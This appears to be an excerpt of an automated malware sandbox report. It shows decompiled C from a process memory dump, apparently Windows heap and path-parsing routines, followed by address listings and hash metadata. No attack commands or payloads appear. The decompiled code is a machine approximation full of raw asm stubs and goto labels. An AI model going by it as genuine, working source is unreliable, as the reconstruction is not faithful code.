													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E010E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E010EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E010EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E010EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E010EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E010EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E010EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E010EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01174CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E010FD130(_t427, _t494, _t511);
				}
			}










































































                                          0x01175ba5
                                          0x01175baa
                                          0x01175baf
                                          0x01175bb4
                                          0x01175bb6
                                          0x01175bbc
                                          0x01175bbe
                                          0x01175bc4
                                          0x01175bcd
                                          0x01175bd3
                                          0x01175bd6
                                          0x01175bdc
                                          0x01175be0
                                          0x01175be3
                                          0x01175beb
                                          0x01175bf2
                                          0x01175bf8
                                          0x01175bfe
                                          0x01175c04
                                          0x01175c0e
                                          0x01175c18
                                          0x01175c1f
                                          0x01175c25
                                          0x01175c2a
                                          0x01175c2c
                                          0x01175c32
                                          0x01175c3a
                                          0x01175c3f
                                          0x01175c42
                                          0x01175c48
                                          0x01175c5b
                                          0x01175c5b
                                          0x01175c2c
                                          0x01175cb7
                                          0x01175cb9
                                          0x01175cbf
                                          0x01175cc2
                                          0x01175cca
                                          0x01175ccb
                                          0x01175ccb
                                          0x01175cd1
                                          0x01175cd7
                                          0x01175cda
                                          0x01175ce1
                                          0x01175ce4
                                          0x01175ce7
                                          0x01175ced
                                          0x01175cf3
                                          0x01175cf9
                                          0x01175cff
                                          0x01175d08
                                          0x01175d0a
                                          0x01175d0e
                                          0x01175d10
                                          0x00000000
                                          0x00000000
                                          0x01175d16
                                          0x01175d1a
                                          0x00000000
                                          0x00000000
                                          0x01175d20
                                          0x01175d22
                                          0x01175d25
                                          0x01175d2f
                                          0x01175d2f
                                          0x01175d33
                                          0x01175d3d
                                          0x01175d49
                                          0x01175d4b
                                          0x00000000
                                          0x00000000
                                          0x01175d5a
                                          0x01175d5d
                                          0x01175d60
                                          0x00000000
                                          0x00000000
                                          0x01175d66
                                          0x01175d69
                                          0x00000000
                                          0x00000000
                                          0x01175d6f
                                          0x01175d6f
                                          0x01175d73
                                          0x01175d79
                                          0x01175d7f
                                          0x01175d86
                                          0x01175d95
                                          0x01175d98
                                          0x01175dba
                                          0x01175dcb
                                          0x01175dce
                                          0x01175dd3
                                          0x01175dd6
                                          0x01175dd8
                                          0x01175de6
                                          0x01175dec
                                          0x01175dee
                                          0x01175df1
                                          0x01175df3
                                          0x0117635a
                                          0x0117635a
                                          0x00000000
                                          0x0117635a
                                          0x01175dfe
                                          0x01175e02
                                          0x01175e05
                                          0x01175e07
                                          0x01175e10
                                          0x01175e13
                                          0x01175e1b
                                          0x01175e1c
                                          0x01175e21
                                          0x01175e22
                                          0x01175e23
                                          0x01175e25
                                          0x01175e2a
                                          0x01175e2c
                                          0x01175e2e
                                          0x01175e36
                                          0x01175e39
                                          0x01175e42
                                          0x01175e47
                                          0x01175e4d
                                          0x01175e54
                                          0x01175e54
                                          0x01175e54
                                          0x01175e2e
                                          0x01175e5c
                                          0x01175e5f
                                          0x01175e62
                                          0x01175e64
                                          0x01175e6b
                                          0x01175e70
                                          0x01175e7a
                                          0x01175e7a
                                          0x01175e7a
                                          0x01175e6b
                                          0x01175e7e
                                          0x01175e7f
                                          0x01175e7f
                                          0x01175e81
                                          0x01175e87
                                          0x01175e8b
                                          0x01175e8c
                                          0x01175e8c
                                          0x01175e8c
                                          0x01175e9a
                                          0x01175e9c
                                          0x01175ea2
                                          0x01175ea6
                                          0x01175f50
                                          0x01175f50
                                          0x01175f57
                                          0x01175f66
                                          0x01175f66
                                          0x01175f66
                                          0x01175f68
                                          0x01175f6a
                                          0x011763d0
                                          0x00000000
                                          0x01175f70
                                          0x01175f70
                                          0x01175f91
                                          0x01175f9c
                                          0x01175f9e
                                          0x01175fa4
                                          0x01175fa6
                                          0x0117638c
                                          0x01176392
                                          0x011763a1
                                          0x011763a7
                                          0x011763af
                                          0x011763af
                                          0x011763bd
                                          0x011763d8
                                          0x00000000
                                          0x011763d8
                                          0x01175fac
                                          0x01175fb2
                                          0x01175fb4
                                          0x01175fbd
                                          0x01175fc6
                                          0x01175fce
                                          0x01175fd4
                                          0x01175fdc
                                          0x01175fec
                                          0x01175fed
                                          0x01175fee
                                          0x01175fef
                                          0x01175ff9
                                          0x01175ffa
                                          0x01175ffb
                                          0x01175ffc
                                          0x01176000
                                          0x01176004
                                          0x01176012
                                          0x01176012
                                          0x01176018
                                          0x01176019
                                          0x0117601a
                                          0x0117601b
                                          0x0117601c
                                          0x01176020
                                          0x01176059
                                          0x0117605c
                                          0x01176061
                                          0x01176061
                                          0x01176022
                                          0x01176022
                                          0x01176022
                                          0x01176025
                                          0x0117602a
                                          0x0117602b
                                          0x01176031
                                          0x01176037
                                          0x01176038
                                          0x0117603e
                                          0x01176048
                                          0x01176049
                                          0x0117604a
                                          0x0117604b
                                          0x0117604c
                                          0x0117604d
                                          0x01176053
                                          0x01176054
                                          0x01176054
                                          0x01176062
                                          0x01176065
                                          0x01176067
                                          0x0117606a
                                          0x01176070
                                          0x01176075
                                          0x01176076
                                          0x01176081
                                          0x01176087
                                          0x01176095
                                          0x01176099
                                          0x0117609e
                                          0x011760a4
                                          0x011760ae
                                          0x011760b0
                                          0x011760b3
                                          0x011760b6
                                          0x011760b8
                                          0x011760ba
                                          0x011760ba
                                          0x011760ba
                                          0x011760ba
                                          0x011760be
                                          0x011760c0
                                          0x011760c5
                                          0x011760c5
                                          0x011760c5
                                          0x011760c6
                                          0x011760cd
                                          0x01176114
                                          0x011760cf
                                          0x011760cf
                                          0x011760d4
                                          0x011760d5
                                          0x011760da
                                          0x011760db
                                          0x011760e1
                                          0x011760e2
                                          0x011760e8
                                          0x011760f8
                                          0x011760fd
                                          0x011760fe
                                          0x01176102
                                          0x01176104
                                          0x01176107
                                          0x01176109
                                          0x0117610b
                                          0x0117610b
                                          0x0117610b
                                          0x0117610b
                                          0x0117610f
                                          0x0117610f
                                          0x01176117
                                          0x0117611a
                                          0x0117611f
                                          0x01176125
                                          0x01176134
                                          0x01176139
                                          0x0117613f
                                          0x01176146
                                          0x01176148
                                          0x0117614b
                                          0x0117614d
                                          0x0117614f
                                          0x0117614f
                                          0x0117614f
                                          0x0117614f
                                          0x01176153
                                          0x01176159
                                          0x01176159
                                          0x0117615c
                                          0x01176163
                                          0x01176169
                                          0x0117616c
                                          0x01176172
                                          0x01176181
                                          0x01176186
                                          0x01176187
                                          0x0117618b
                                          0x01176191
                                          0x01176195
                                          0x011761a3
                                          0x011761bb
                                          0x011761c0
                                          0x011761c3
                                          0x011761cc
                                          0x011761d0
                                          0x011761dc
                                          0x011761de
                                          0x011761e1
                                          0x011761e4
                                          0x011761e6
                                          0x011761e8
                                          0x011761e8
                                          0x011761e8
                                          0x011761e8
                                          0x011761e6
                                          0x011761ec
                                          0x011761f3
                                          0x01176203
                                          0x01176209
                                          0x0117620a
                                          0x01176216
                                          0x0117621d
                                          0x01176227
                                          0x01176241
                                          0x01176246
                                          0x0117624c
                                          0x01176257
                                          0x01176259
                                          0x0117625c
                                          0x0117625e
                                          0x01176260
                                          0x01176260
                                          0x01176260
                                          0x01176260
                                          0x0117625e
                                          0x01176264
                                          0x01176267
                                          0x01176269
                                          0x01176315
                                          0x01176315
                                          0x0117631b
                                          0x0117631e
                                          0x01176324
                                          0x01176327
                                          0x0117632f
                                          0x01176330
                                          0x01176333
                                          0x0117633a
                                          0x0117633c
                                          0x01176335
                                          0x01176335
                                          0x01176335
                                          0x0117633f
                                          0x01176342
                                          0x0117634c
                                          0x01176352
                                          0x01176355
                                          0x01176355
                                          0x01176359
                                          0x00000000
                                          0x0117626f
                                          0x01176275
                                          0x01176275
                                          0x01176278
                                          0x0117627e
                                          0x0117627e
                                          0x01176281
                                          0x01176287
                                          0x0117628d
                                          0x01176298
                                          0x0117629c
                                          0x011762a2
                                          0x0117629e
                                          0x0117629e
                                          0x0117629e
                                          0x011762a7
                                          0x011762a7
                                          0x011762aa
                                          0x011762b0
                                          0x011762f0
                                          0x011762f0
                                          0x011762f2
                                          0x011762f8
                                          0x011762fd
                                          0x011762b2
                                          0x011762b2
                                          0x011762b2
                                          0x011762b5
                                          0x011762dd
                                          0x011762e2
                                          0x011762e5
                                          0x011762b7
                                          0x011762b8
                                          0x011762bb
                                          0x011762bd
                                          0x011762c0
                                          0x011762c4
                                          0x011762cd
                                          0x011762cd
                                          0x011762c0
                                          0x011762bb
                                          0x011762b5
                                          0x01176302
                                          0x01176303
                                          0x01176305
                                          0x01176305
                                          0x01176305
                                          0x0117630c
                                          0x0117630c
                                          0x00000000
                                          0x0117627e
                                          0x01176269
                                          0x01175eac
                                          0x01175ebb
                                          0x01175ebe
                                          0x01175ecb
                                          0x01175ecb
                                          0x01175ece
                                          0x01175ece
                                          0x01175ed4
                                          0x01175ed7
                                          0x01175ed9
                                          0x01175edb
                                          0x01175edb
                                          0x01175ee1
                                          0x01175ee1
                                          0x01175ee3
                                          0x01175f20
                                          0x01175f20
                                          0x01175ee5
                                          0x01175ee5
                                          0x01175ee5
                                          0x01175ee8
                                          0x01175f11
                                          0x01175f18
                                          0x01175eea
                                          0x01175eea
                                          0x01175eed
                                          0x01175ef2
                                          0x01175ef8
                                          0x01175efb
                                          0x01175f0a
                                          0x01175f0a
                                          0x01175eed
                                          0x01175ee8
                                          0x01175f22
                                          0x01175f28
                                          0x00000000
                                          0x00000000
                                          0x01175f30
                                          0x01175f31
                                          0x01175f37
                                          0x01175f3a
                                          0x01175f3d
                                          0x01175f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01175f46
                                          0x01175f48
                                          0x01175f4d
                                          0x00000000
                                          0x01175f4d
                                          0x01175dda
                                          0x01175ddf
                                          0x00000000
                                          0x01175ddf
                                          0x01175dd8
                                          0x01175da7
                                          0x01175da9
                                          0x01175dac
                                          0x01175dae
                                          0x00000000
                                          0x01175db4
                                          0x01175db4
                                          0x00000000
                                          0x01175db4
                                          0x01175dae
                                          0x01175d88
                                          0x01175d8d
                                          0x01176363
                                          0x01176369
                                          0x0117636a
                                          0x01176370
                                          0x01176372
                                          0x0117637a
                                          0x0117637b
                                          0x0117637d
                                          0x00000000
                                          0x00000000
                                          0x0117637f
                                          0x01176385
                                          0x00000000
                                          0x01176385
                                          0x01175d38
                                          0x01175d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01175d3b
                                          0x01175d27
                                          0x01175d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01176360
                                          0x00000000
                                          0x01176360
                                          0x01175c10
                                          0x01175c10
                                          0x011763da
                                          0x011763e5
                                          0x011763e5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17149186cfd306f76270ae115783bf4372833a8c38021f44571f10a88cfc786a
                                          • Instruction ID: 917e93f9ebd2d52475a86d0c5675fe54775d48b52a420a25e1e0f1856eda28af
                                          • Opcode Fuzzy Hash: 17149186cfd306f76270ae115783bf4372833a8c38021f44571f10a88cfc786a
                                          • Instruction Fuzzy Hash: 4E426B71900629CFEB68CF68C880BA9BBB1FF49304F1581AAD94DEB342D7349985CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C4120 Relevance: .4, Instructions: 444COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E010C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x119d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E010DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E010C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L010C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E010C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
